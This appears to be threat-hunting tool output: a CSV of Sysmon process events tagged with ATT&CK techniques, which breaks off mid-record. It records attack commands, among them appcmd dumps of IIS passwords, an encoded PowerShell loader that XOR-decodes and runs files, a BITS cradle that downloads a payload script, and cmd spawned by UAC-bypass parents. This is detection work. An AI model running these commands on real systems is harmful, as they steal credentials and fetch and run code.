[T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Filename: redirection.config&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.323652Z"">
</TimeCreated>
<EventRecordID>5955</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.283</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00108FBFFF00</Data>
<Data Name=""ProcessId"">168</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Filename: redirection.config&quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
</TimeCreated>
<EventRecordID>4895</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
<Data Name=""ProcessId"">6720</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ParentProcessId"">2948</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
</TimeCreated>
<EventRecordID>4895</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
<Data Name=""ProcessId"">6720</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ParentProcessId"">2948</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-07T13:13:02.481447Z"">
</TimeCreated>
<EventRecordID>112815</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2888"" ThreadID=""3384"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-07 13:13:02.476</Data>
<Data Name=""ProcessGuid"">747F3D96-095E-5EB4-0000-0010D46F1800</Data>
<Data Name=""ProcessId"">5216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-08F7-5EB4-0000-0020BAEC0200</Data>
<Data Name=""LogonId"">0x2ecba</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-095E-5EB4-0000-001002511800</Data>
<Data Name=""ParentProcessId"">6396</Data>
<Data Name=""ParentImage"">C:\Windows\System32\changepk.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\ChangePk.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
</TimeCreated>
<EventRecordID>4895</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
<Data Name=""ProcessId"">6720</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ParentProcessId"">2948</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T10:16:50.009124Z"">
</TimeCreated>
<EventRecordID>5950</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 10:16:49.960</Data>
<Data Name=""ProcessGuid"">747F3D96-B091-5D46-0000-001081F71104</Data>
<Data Name=""ProcessId"">820</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B080-5D46-0000-0010D4EA0F04</Data>
<Data Name=""ParentProcessId"">2112</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WSReset.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\WSReset.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-26T22:26:14.523075Z"">
</TimeCreated>
<EventRecordID>339222</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3332"" ThreadID=""4376"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-26 22:26:14.521</Data>
<Data Name=""ProcessGuid"">747F3D96-0306-5F1E-0000-0010E15F3100</Data>
<Data Name=""ProcessId"">3660</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-F938-5F1D-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F938-5F1D-0000-00104B500000</Data>
<Data Name=""ParentProcessId"">584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\winlogon.exe</Data>
<Data Name=""ParentCommandLine"">winlogon.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;. )&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.555423Z"">
</TimeCreated>
<EventRecordID>5991</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.475</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010F2EDFF00</Data>
<Data Name=""ProcessId"">4012</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;. )&quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 